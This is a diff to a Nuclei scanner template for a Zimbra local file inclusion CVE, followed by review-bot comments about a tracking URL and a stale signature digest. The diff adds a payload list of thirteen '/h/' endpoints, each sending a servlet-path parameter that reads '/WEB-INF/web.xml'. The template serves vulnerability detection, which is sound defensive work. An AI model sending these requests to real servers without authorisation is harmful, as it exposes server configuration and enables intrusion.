diff --git a/http/cves/2025/CVE-2025-68645.yaml b/http/cves/2025/CVE-2025-68645.yaml
index 0571b24d2eff..87f34196b4d6 100644
--- a/http/cves/2025/CVE-2025-68645.yaml
+++ b/http/cves/2025/CVE-2025-68645.yaml
@@ -12,8 +12,10 @@ info:
 Update to the latest version of Zimbra Collaboration.
 reference:
 - https://x.com/sirifu4k1/status/2006031417088639064
+ - https://x.com/sirifu4k1/status/2007279822050078906?s=12&t=ovaWmJElNlGyzadE74ZOgQ
+ - https://nvd.nist.gov/vuln/detail/CVE-2025-68645
 metadata:
- max-request: 1
+ max-request: 13
 verified: true
 shodan-query: http.title:"Zimbra Collaboration Suite"
 tags: cve,cve2025,zimbra,zcs,lfi,vkev,kev
@@ -21,7 +23,25 @@ info:
 http:
 - method: GET
 path:
- - "{{BaseURL}}/h/rest?javax.servlet.include.servlet_path=/WEB-INF/web.xml"
+ - "{{BaseURL}}/{{path}}?javax.servlet.include.servlet_path=/WEB-INF/web.xml"
+
+ payloads:
+ path:
+ - "h/rest"
+ - "h/changepass"
+ - "h/imessage"
+ - "h/postLoginRedirect"
+ - "h/printcalls"
+ - "h/printcalendar"
+ - "h/printvoicemails"
+ - "h/printappointments"
+ - "h/printcontacts"
+ - "h/printconversations"
+ - "h/printmessage"
+ - "h/printtasks"
+ - "h/viewimages"
+
+ stop-at-first-match: true

 matchers-condition: and
 matchers:
@@ -36,4 +56,4 @@ http:
 - type: status
 status:
 - 200
-# digest: 4a0a0047304502203330afdc79a7f6ae501eeb5a9d8914f5f87e453fd2d8647634f50a1ea9226f82022100c6cd3cb5903a43ffe7e8b1ea780e72a0d87714c68b220670163880d61965cc29:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502203330afdc79a7f6ae501eeb5a9d8914f5f87e453fd2d8647634f50a1ea9226f82022100c6cd3cb5903a43ffe7e8b1ea780e72a0d87714c68b220670163880d61965cc29:922c64590222798bb761d5b6d8e72950
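Review bot: The first added reference keeps its share-tracking query string (`?s=12&t=ovaWmJElNlGyzadE74ZOgQ`); cite the canonical URL instead, `- https://x.com/sirifu4k1/status/2007279822050078906`. The parameters appear to be sharing metadata rather than part of the post's address, so they add nothing to the citation and tie the link to whoever copied it. The `info:` block starts before this hunk, so the rest of the metadata is not reviewed here.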
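Review bot: The request block is rewritten here, but the `# digest:` line in the last hunk keeps the same signature value and only gains a trailing newline, so the signature no longer corresponds to the template content. A digest that does not verify would normally make Nuclei load the template as unsigned, so it should be re-signed, or left to the repository's signing job if one runs after merge, before consumers rely on it. It would also help to say where the endpoint list comes from, for example `# alternate /h/ endpoints; tried in order, first match wins` above `payloads:`. The matchers begin at the end of this hunk and continue outside it, so whether they stay specific enough across all 13 paths cannot be confirmed from here.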